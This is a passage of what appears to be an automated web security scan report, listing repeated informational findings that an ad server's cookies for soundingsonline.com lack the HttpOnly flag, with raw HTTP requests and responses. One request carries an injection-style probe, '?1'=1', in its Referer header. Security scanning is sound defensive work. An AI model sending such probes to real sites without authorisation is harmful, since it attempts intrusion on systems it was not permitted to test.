  • NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1241424720@Top,Middle,Right,Right1,x01,x02,x03,x04? HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: oasc05139.247realmedia.com
Cookie: OAX=rcHW800+NG4ADRRy; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:54:42 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 4510
Content-Type: application/x-javascript
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

function OAS_RICH(position) {
if (position == 'Middle') {
document.write ('<A HREF="http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1730348108/Middle
...[SNIP]...

14.339. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1251933878@Top,Middle,Right,Right1,x01,x02,x03,x04

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1251933878@Top,Middle,Right,Right1,x01,x02,x03,x04

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1251933878@Top,Middle,Right,Right1,x01,x02,x03,x04? HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: oasc05139.247realmedia.com
Cookie: OAX=rcHW800+NG4ADRRy; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 03:01:23 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 4566
Content-Type: application/x-javascript
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

function OAS_RICH(position) {
if (position == 'Middle') {
document.write ('<A HREF="http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/476095038/Middle/
...[SNIP]...

14.340. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1264761221@Top,Middle,Right,Right1,x01,x02,x03,x04

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1264761221@Top,Middle,Right,Right1,x01,x02,x03,x04

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • OAX=rcHW800+NG4ADRRy; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.247realmedia.com
  • NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660;path=/
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1264761221@Top,Middle,Right,Right1,x01,x02,x03,x04? HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: oasc05139.247realmedia.com

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:24:46 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: OAX=rcHW800+NG4ADRRy; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.247realmedia.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 4570
Content-Type: application/x-javascript
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660;path=/

function OAS_RICH(position) {
if (position == 'Middle') {
document.write ('<A HREF="http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/844694778/Middle/
...[SNIP]...

14.341. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1271414808@Top,Middle,Right,Right1,x01,x02,x03,x04

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1271414808@Top,Middle,Right,Right1,x01,x02,x03,x04

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1271414808@Top,Middle,Right,Right1,x01,x02,x03,x04? HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: oasc05139.247realmedia.com
Cookie: OAX=rcHW800+NG4ADRRy; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:57:19 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 4575
Content-Type: application/x-javascript
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

function OAS_RICH(position) {
if (position == 'Middle') {
document.write ('<A HREF="http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/133479354/Middle/
...[SNIP]...

14.342. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1273853013@Top,Middle,Right,Right1,x01,x02,x03,x04

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1273853013@Top,Middle,Right,Right1,x01,x02,x03,x04

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1273853013@Top,Middle,Right,Right1,x01,x02,x03,x04? HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: oasc05139.247realmedia.com
Cookie: OAX=rcHW800+NG4ADRRy; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:53:47 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 4573
Content-Type: application/x-javascript
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

function OAS_RICH(position) {
if (position == 'Middle') {
document.write ('<A HREF="http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1958452740/Middle
...[SNIP]...

14.343. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1280349904@Top,Middle,Right,Right1,x01,x02,x03,x04

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1280349904@Top,Middle,Right,Right1,x01,x02,x03,x04

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1280349904@Top,Middle,Right,Right1,x01,x02,x03,x04? HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: oasc05139.247realmedia.com
Cookie: OAX=rcHW800+NG4ADRRy; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:55:35 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 4515
Content-Type: application/x-javascript
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

function OAS_RICH(position) {
if (position == 'Middle') {
document.write ('<A HREF="http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1778979805/Middle
...[SNIP]...

14.344. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1319458490@Top,Middle,Right,Right1,x01,x02,x03,x04

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1319458490@Top,Middle,Right,Right1,x01,x02,x03,x04

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1319458490@Top,Middle,Right,Right1,x01,x02,x03,x04? HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: oasc05139.247realmedia.com
Cookie: OAX=rcHW800+NG4ADRRy; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 03:01:27 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 4573
Content-Type: application/x-javascript
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

function OAS_RICH(position) {
if (position == 'Middle') {
document.write ('<A HREF="http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1858990688/Middle
...[SNIP]...

14.345. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1326693698@Top,Middle,Right,Right1,x01,x02,x03,x04

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1326693698@Top,Middle,Right,Right1,x01,x02,x03,x04

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1326693698@Top,Middle,Right,Right1,x01,x02,x03,x04? HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: oasc05139.247realmedia.com
Cookie: OAX=rcHW800+NG4ADRRy; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:55:33 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 4558
Content-Type: application/x-javascript
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

function OAS_RICH(position) {
if (position == 'Middle') {
document.write ('<A HREF="http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1444744161/Middle
...[SNIP]...

14.346. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1341529874@Top,Middle,Right,Right1,x01,x02,x03,x04

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1341529874@Top,Middle,Right,Right1,x01,x02,x03,x04

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1341529874@Top,Middle,Right,Right1,x01,x02,x03,x04? HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: oasc05139.247realmedia.com
Cookie: OAX=rcHW800+NG4ADRRy; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:55:07 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 4263
Content-Type: application/x-javascript
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

function OAS_RICH(position) {
if (position == 'Middle') {
document.write ('<A HREF="http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1840815215/Middle
...[SNIP]...

14.347. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1347161569@Top,Middle,Right,Right1,x01,x02,x03,x04

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1347161569@Top,Middle,Right,Right1,x01,x02,x03,x04

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1347161569@Top,Middle,Right,Right1,x01,x02,x03,x04? HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: oasc05139.247realmedia.com
Cookie: OAX=rcHW800+NG4ADRRy; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:56:34 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 4324
Content-Type: application/x-javascript
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

function OAS_RICH(position) {
if (position == 'Middle') {
document.write ('<A HREF="http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1261949143/Middle
...[SNIP]...

14.348. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1357663315@Top,Middle,Right,Right1,x01,x02,x03,x04

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1357663315@Top,Middle,Right,Right1,x01,x02,x03,x04

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1357663315@Top,Middle,Right,Right1,x01,x02,x03,x04? HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: oasc05139.247realmedia.com
Cookie: OAX=rcHW800+NG4ADRRy; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 03:01:41 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 4296
Content-Type: application/x-javascript
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

function OAS_RICH(position) {
if (position == 'Middle') {
document.write ('<A HREF="http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1338348268/Middle
...[SNIP]...

14.349. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1361342262@Top,Middle,Right,Right1,x01,x02,x03,x04

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1361342262@Top,Middle,Right,Right1,x01,x02,x03,x04

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1361342262@Top,Middle,Right,Right1,x01,x02,x03,x04? HTTP/1.1
Host: oasc05139.247realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.soundingsonline.com/?1'=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW8003BLsABpSl; NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:52:46 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 4328
Content-Type: application/x-javascript
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

function OAS_RICH(position) {
if (position == 'Middle') {
document.write ('<A HREF="http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1521431190/Middle
...[SNIP]...

14.350. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1376047824@Top,Middle,Right,Right1,x01,x02,x03,x04

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1376047824@Top,Middle,Right,Right1,x01,x02,x03,x04

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1376047824@Top,Middle,Right,Right1,x01,x02,x03,x04? HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: oasc05139.247realmedia.com
Cookie: OAX=rcHW800+NG4ADRRy; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:56:25 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 4568
Content-Type: application/x-javascript
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

function OAS_RICH(position) {
if (position == 'Middle') {
document.write ('<A HREF="http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/333107184/Middle/
...[SNIP]...

14.351. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1413816750@Top,Middle,Right,Right1,x01,x02,x03,x04

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1413816750@Top,Middle,Right,Right1,x01,x02,x03,x04

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1413816750@Top,Middle,Right,Right1,x01,x02,x03,x04? HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: oasc05139.247realmedia.com
Cookie: OAX=rcHW800+NG4ADRRy; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:56:10 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 4535
Content-Type: application/x-javascript
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

function OAS_RICH(position) {
if (position == 'Middle') {
document.write ('<A HREF="http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/377171051/Middle/
...[SNIP]...

14.352. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1415276276@Top,Middle,Right,Right1,x01,x02,x03,x04

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1415276276@Top,Middle,Right,Right1,x01,x02,x03,x04

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1415276276@Top,Middle,Right,Right1,x01,x02,x03,x04? HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: oasc05139.247realmedia.com
Cookie: OAX=rcHW800+NG4ADRRy; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:56:19 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 4542
Content-Type: application/x-javascript
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

function OAS_RICH(position) {
if (position == 'Middle') {
document.write ('<A HREF="http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1915180336/Middle
...[SNIP]...

14.353. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1460402778@Top,Middle,Right,Right1,x01,x02,x03,x04

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1460402778@Top,Middle,Right,Right1,x01,x02,x03,x04

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

